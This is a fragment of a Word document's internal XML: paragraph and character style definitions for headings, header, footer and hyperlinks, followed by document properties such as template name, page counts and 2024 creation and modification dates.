        <w14:solidFill>
          <w14:schemeClr w14:val="tx1"/>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="3">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:link w:val="18"/>
    <w:semiHidden/>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4"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:link w:val="20"/>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paragraph" w:styleId="5">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:link w:val="19"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="40" w:after="0"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="376092" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:default="1" w:styleId="6">
    <w:name w:val="Default Paragraph Font"/>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footer"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="12"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4513"/>
        <w:tab w:val="right" w:pos="9026"/>
      </w:tabs>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="9">
    <w:name w:val="header"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="11"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4513"/>
        <w:tab w:val="right" w:pos="9026"/>
      </w:tabs>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="10">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="6"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="11">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="6"/>
    <w:link w:val="9"/>
    <w:uiPriority w:val="99"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="12">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="6"/>
    <w:link w:val="8"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="13">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="6"/>
    <w:link w:val="2"/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
      <w:lang w:eastAsia="en-IN"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="tx1"/>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="14">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="34"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="15">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="6"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="16">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="2"/>
    <w:next w:val="1"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:spacing w:before="240" w:after="0" w:line="259" w:lineRule="auto"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:b w:val="0"/>
      <w:bCs w:val="0"/>
      <w:color w:val="376092" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="17">
    <w:name w:val="pw-post-body-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customStyle="1" w:styleId="18">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="6"/>
    <w:link w:val="3"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="376092" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="19">
    <w:name w:val="Heading 5 Char"/>
    <w:basedOn w:val="6"/>
    <w:link w:val="5"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="376092" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="20">
    <w:name w:val="Heading 4 Char"/>
    <w:basedOn w:val="6"/>
    <w:link w:val="4"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="376092"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C335CE-4D2F-45A1-97C0-AA7E93DC0D1F}">
  <ds:schemaRefs/>
</ds:datastoreItem>
</file>

<file path=docProps/app.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes">
  <Template>Normal.dotm</Template>
  <Pages>22</Pages>
  <Words>896</Words>
  <Characters>5110</Characters>
  <Lines>42</Lines>
  <Paragraphs>11</Paragraphs>
  <TotalTime>245</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>5995</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2024-02-20T14:09:00Z</dcterms:created>
  <dc:creator>919328323377</dc:creator>
  <cp:lastModifiedBy>Apex</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-03-07T06:57:45Z</dcterms:modified>
  <cp:revision>634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3B2328AAD24148A2AD9EF4C592267D8C_12</vt:lpwstr>
  </property>
</Properties>
</file>